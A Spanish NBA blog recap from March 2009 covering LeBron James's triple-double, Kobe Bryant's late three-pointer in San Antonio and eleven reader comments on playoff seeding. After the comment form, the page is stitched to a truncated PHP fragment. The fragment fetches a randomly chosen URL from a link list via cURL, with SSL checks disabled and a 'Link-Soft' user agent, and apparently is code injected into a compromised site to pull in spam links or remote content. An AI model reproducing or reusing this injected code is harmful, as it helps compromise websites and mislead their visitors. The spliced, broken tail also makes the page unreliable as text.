La Crónica (12/03/2009)

13 de March de 2009 por txusma

Ayer preguntábamos qué 2 equipos se llevarían la victoria en los interesantes enfrentamientos de la noche y la opción más extendida entre las respuestas daba la victoria a Spurs y Suns. Una vez más demostramos que posiblemente no podríamos ganarnos la vida con las apuestas (por cierto, felicidades para Landruski).

Desde el All-Star las voces que piden a gritos el MVP para Dwyane Wade han arreciado pero a “King” James, lejos de dejarle sordo, le han dado un plus de motivación. Con el de ayer encadena 3 triples dobles consecutivos, que se dice pronto, y ya suma 6 en toda la temporada. Liderados por LeBron y Mo Williams, los Cavs consiguieron, por fin, la primera victoria en Phoenix de la década.

Y en el otro partido, los Lakers decidieron no descansar y dieron un golpe de autoridad con una trabajada victoria en la pista de San Antonio y, de paso, se aseguraron matemáticamente una plaza en los Playoffs. Los amarillos fueron por delante en el marcador durante todo el encuentro , salvo con el 0-2 inicial, y dispusieron de diferencias más o menos cómodas de 10 puntos. Pero en el último cuarto los tejanos llegaron a ponerse a 2 tras un triple de Tony Parker. Fue en ese momento cuando apareció Kobe que, con un triple increíble en la cara de George Hill, definió el partido para los suyos. En un pabellón que tampoco le tiene en mucha estima, Kobe fue despedido a gritos de “MVP! MVP!”. ¿El tercero en discordía?

PREMIOS

MVP: 34 puntos, 13 asistencias y 10 rebotes. Si hay algún jugador que pueda como mínimo acercarse a la proeza de promediar un triple doble en una temporada entera ese es, sin duda, LeBron James.

Rookie: Muy poquito protagonismo de los rookies ayer, casi anecdótico. En todo caso destacamos los 6 puntitos y 3 rebotes que aportó Robin López a su equipo aprovechando la eliminación por faltas de Shaq.

Sorpresa: Pensábamos que ya se le había olvidado pero ayer Michael Finley, con 25 puntos, nos demostró que quien tuvo, retuvo. Buen partido también de Matt Barnes, 21 puntos, 5 asistencias y 4 rebotes.

Decepción: Como hemos dicho antes, Shaquille O’Neal tan sólo pudo disputar 25 minutos antes de su eliminación por faltas personales. Si hubiera aguantado más en pista posiblemente el resultado del partido habría sido distinto.

Esfuerzo en vano: El de la pareja Nash-Barnes en Phoenix y Parker-Finley en San Antonio. Es lo que tiene cuanto te enfrentas a, posiblemente, los 2 mejores jugadores del mundo.

RAZONES PARA TRASNOCHAR

Once encuentros se disputarán durante la madrugada del viernes al sábado. Sin un partido que enfrente a dos equipos de la zona alta, nos quedamos con el más trascendente de cara a la clasificación de todos los que se disputan:

Bulls @ Sixers (00:00 GMT+1). El 9º del Este visita al 7º. Los Bulls vienen de perder en Miami y Orlando, y su próximo calendario no es como para ser muy optimistas, con partidos ante Hornets, Celtics y Lakers en el plazo de una semana. Así que la victoria en el Wachovia Center se presenta fundamental. Los Sixers, por su parte, tratan de alcanzar la sexta plaza y evitar así a los Celtics. Más les valdría.

Además, recomendamos prestar especial atención a… LeBron James. ¿A por el cuarto? Los Kings parecen poco rival, demasiado poco.

La pregunta del día: ¿Se han quedado Cavs y Lakers solos en la carrera por asegurar la ventaja de campo en todos los Playoffs?

Comenta

11 comentarios a esta entrada

  1. Noname dice:
    #1

    Lebron …. JUGON!!! Sobre la pregunta del dia creo que no hay que descartar nunca a los verdes, pero tambien pienso que no superaran a los cavs al final de la temporada regular. Me causan mas dudas unos Lakers capaces de lo mejor y de lo peor, el corazon me dice que acabaran por delante de cavs, pero la cabeza no dice lo mismo, mas que nada porque pienso que segun se vaya acercando el final de temporada pueden tener un bajon importante por el cansancio fisico que arrastran, y por la relajacion que les pueda venir. De todas maneras si no se empiezan a procupar por los playoffs antes de tiempo y se centran en sacar el mejor balance posible, creo que los lakers pueden y deben asegurarse la ventaja de campo hasta el final.
    Saludos

      Citar

  2. Txusma dice:
    #2

    Y me pregunto: Q hubiera pasado si Kobe falla este triple? Considerais que es un triple bien tirado? No me refiero a la ejecución que evidentemente es perfecta sino a si no habia más posibilidades q tirarse un triple casi imposible.

      Citar

  3. MagicJohnson32 dice:
    #3

    Txus, quedaban 2 segundos de posesión cuando recibió. Si ves la jugada, Kobe y Pau juegan un pick & roll. Kobe se la da a Pau a unos 5 metros y con cierta ventaja sobre Duncan, pero se frena y se la devuelve a Kobe en la línea de 3. Pau va de nuevo a bloquear pero Kobe, ya que queda tan poco tiempo, le dice que se vaya. Y entonces da un bote a la izquierda y se eleva, sin tiempo para más.

    ¿Si está bien tirado? Se lo hemos visto tantas veces… Desde esa misma posición y esta misma temporada me vienen a la cabeza…
    Ayer, en Houston: http://www.youtube.com/watch?v=Bdj1bqka0v0
    O precisamente en las anteriores visitas a Houston y San Antonio: http://www.youtube.com/watch?v=u9hAcpZsYA0 (aquí están los dos triples)
    O en la visita a los Jazz: http://www.youtube.com/watch?v=Prk9OleMFVo
    O en la visita a los Hornets, en la cara de Posey: http://www.youtube.com/watch?v=HhlGqkMbZMc

    Curioso, todos a domicilio…

      Citar

  4. Viva_Dirk dice:
    #4

    Creo que Paul ya lleva 6 triples dobles también este año asi que habrá que ponerle al mismo nivel que Lebron a la hora de promediarlo en una temporada.

    Además hace triples dobles sin suspicacias ni tonterias, ayer Lebron cogió el 10º rebote en el último segundo del partido y le faltó pegar a su compañero para que le dejase cogerlo.

    En cuanto a triple, es lo que explica Magic, quedaban 2 segundos de posesión.

      Citar

  5. Txusma dice:
    #5

    Vale, en el video no alcazaba a ver cuanto quedaba. Esta claro q en esta clase de situacion ni Wade, ni Lebron, ni leches… En mi equipo quiero a Kobe si o si.

    Yo no he dicho q Lebron sea el que mas oportunidades tengas por haber hecho 6 triples dobles esta temporada. Y vamos, me reafirmo que si tuviera q apostar dinero por uno de los 2, iría todo para Lebron. Pero todo. Tu apostarías por Paul?

      Citar

  6. Landrusski dice:
    #6

    GRACIAS POR NOMBRARME EN LA CRONICA….ESTE BLOG ES EL MEJOR DE BALONCESTO KE HAY DE VERDAD OS LO DIGO…SOIS UNOS CRACK!!!!!;)

    POR CIERTO LEBRON ES UN JUGON,PERO SIGO PENSANDO KE CUANDO LE DEFIENDES BIEN Y LE IMPIDES LAS PENETRACIONES LEBRON SE KEDA EN UN JUGADOR MEDIOCRE

      Citar

  7. Landrusski dice:
    #7

    por cierto,triplazo de kobe en la cara impresionante!!!!! menudo crack ke es mi amigo bryant….yo creo ke con esto demuestra ke es el numero 1,porke se supera en los momentos decisivos

      Citar

  8. sabas dice:
    #8

    Si Lakers y Cavs quedaran empatados a victorias ¿quien trendria el factor chanca a favor? Recuerdo que los Lakers ganaron en casa de los Cavs, pero no recuerdo como quedaron en Los Angeles o si todavia tienen que enfrentarse. Por que el criterio si seria ese no, ver como han quedado en sus enfrentamientos. A ver si alguien me puede resolver la duda.Gracias.

      Citar

  9. kantonyo dice:
    #9

    joder!!! no vuelvo a pronósticar estando LeBron de por medio, y menos aún pronosticar en contra…. Por cierto con esta derrota Phoenix ha dejado decidido los 8 equipos del oeste que iran a playoffs. Miren este dato:

    En este momento Dallas es octavo con un 62% de victorias, teniendo en cuenta que siendo pesimista pueda bajar su ritmo al final de temporada a un 58%, llegaria a 48 victorias, por lo tanto tendria un balance final de 8-9.

    Phoenix para llegar a esas 48 victorias necesita un balance de 14 victorias y solo 3 derrotas, casi imposible y eso que le hemos sido favorable en derrotas el octavo puesto, si siguieran al ritmo de 62%, estarían ya eliminados.

    Por lo tanto yo creo que Phoenix ha dicho adios a la post-season.

      Citar

  10. MagicJohnson32 dice:
    #10

    A LANDRUSKI, muchísimas gracias. Comentarios como el tuyo animan a seguir, en serio.

    A SABAS, los Lakers han ganado los dos partidos tanto a Cavs como a Celtics, así que en caso de mismo balance mantendrían la ventaja de campo. La victoria de los Lakers sobre los Cavs en LA fue aquel partido en el que Kobe se dislocó el dedo en los primeros minutos. Fue una victoria clara de los Lakers con Kobe y Pau de cracks.

      Citar

  11. Landrusski dice:
    #11

    MAGIC,GRACIAS A VOSOTROS POR LA PAGINA TAN BUENA,YO ME METO TODOS LOS DIAS Y RECOMIENDO A TODOS LOS KE LE GUSTEN LA NBA A QUE SE METAN EN ESTA PAGINA Y QUE LA VISITEN.

    SOBRE LA PREGUNTA DEL DIA QUERIA DECIR QUE SI QUE YO CREO QUE TANTO LAKERS COMO CAVS SE HAN KEDADO SOLOS PARA ASEGURAR LA VENTAJHA DE CAMPO,PORKE VIENDO LAS BAJAS DE CELTICS NO LES VEO CAPACES DE REMONTAR

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>